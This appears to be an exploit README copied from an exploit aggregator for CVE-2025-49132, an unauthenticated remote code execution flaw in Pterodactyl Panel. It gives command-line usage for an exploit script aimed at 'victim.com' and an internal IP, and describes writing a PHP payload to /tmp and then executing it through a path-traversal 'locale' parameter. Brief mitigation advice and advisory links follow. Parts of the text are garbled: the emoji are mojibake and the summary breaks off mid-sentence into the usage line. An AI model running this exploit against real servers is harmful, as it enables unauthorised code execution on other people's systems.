Share
## https://sploitus.com/exploit?id=3FBA1C46-B95F-56DB-AAF8-2E276C597DE9
# CVE-2025-49132

**Pterodactyl Panel - Unauthenticated Remote Code Execution (RCE)**

---

## ๐Ÿ”Ž Summary

**CVEโ€‘2025โ€‘49132** is a critical Remote Code
Execution vulnerability affecting **Pterodactyl Panel \ --cmd "" [--path ]
```

### Examples

```bash
python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR
```

Default path:

    /usr/share/php/PEAR

Get Proper Path from `/phpinfo.php` page
![alt text](image.png)

---

## ๐Ÿ›  Exploitation Flow

### Step 1 - Write Payload

The attacker injects a malicious PHP payload into `/tmp/payload.php`
using:

    /+/tmp/payload.php

### Step 2 --- Trigger Execution

By calling:

    ?locale=../../../../../tmp&namespace=payload

The server executes the injected PHP.

## ![alt text](image-1.png)

## ๐Ÿ›ก Mitigation

- Upgrade to **Pterodactyl Panel \>= 1.11.11**
- Sanitize `locale` and `namespace` inputs
- Disable dangerous PHP functions
- Restrict unnecessary endpoint exposure

---

## ๐Ÿ“š References

- GitHub Advisory: [GHSA-24wv-6c99-f843](https://github.com/advisories/GHSA-24wv-6c99-f843)
- [CVE-2025-49132](https://nvd.nist.gov/vuln/detail/cve-2025-49132)
- [Pterodactyl Panel v1.11.11 Patch Commit](https://github.com/pterodactyl/panel/releases/tag/v1.11.11)

---